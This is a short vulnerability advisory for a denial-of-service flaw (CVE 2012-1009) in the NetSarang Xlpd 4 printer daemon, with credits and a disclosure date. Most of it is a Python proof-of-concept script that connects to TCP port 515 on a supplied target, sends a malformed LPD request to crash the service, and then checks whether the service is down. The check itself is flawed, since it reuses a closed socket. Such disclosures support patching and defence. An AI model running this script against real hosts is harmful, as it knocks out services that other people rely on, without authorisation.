NetSarang Xlpd Printer Daemon version 4 is prone to a denial of service vulnerability.
Credit:
The information has been provided by Prabhu S Angadi .
Vulnerable Systems:
* NetSarang Xlpd 4 Build 0100
* NetSarang Xmanager Enterprise 4 Build 0186
The vulnerability is caused due to improper validation of malicious LPD request sent to printer daemon, which allows remote attackers to crash the service.
Successful exploitation could allow an attacker to cause denial of service condition.
import socket,sys,time
port = 515
if len(sys.argv) < 2:
print "\n[-] Usage: %s <target addr>" % sys.argv[0]
sys.exit(0)
target = sys.argv[1]
sockObj = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
sockObj.connect((target,port))
except:
print "\n[-] Xlpd service is down."
sys.exit(0)
sockObj.send("crap"+"LF")
sockObj.send("LF")
#Will wait for a while
time.sleep(5)
sockObj.close()
try:
sockObj.connect((target,port))
except:
print "\n[-] Xlpd service is crashed, unble to connect"
sys.exit(0)
CVE Information:
2012-1009
Disclosure Timeline:
Published: 2012-02-02
Please enable JavaScript to view the comments powered by Disqus.
blog comments powered by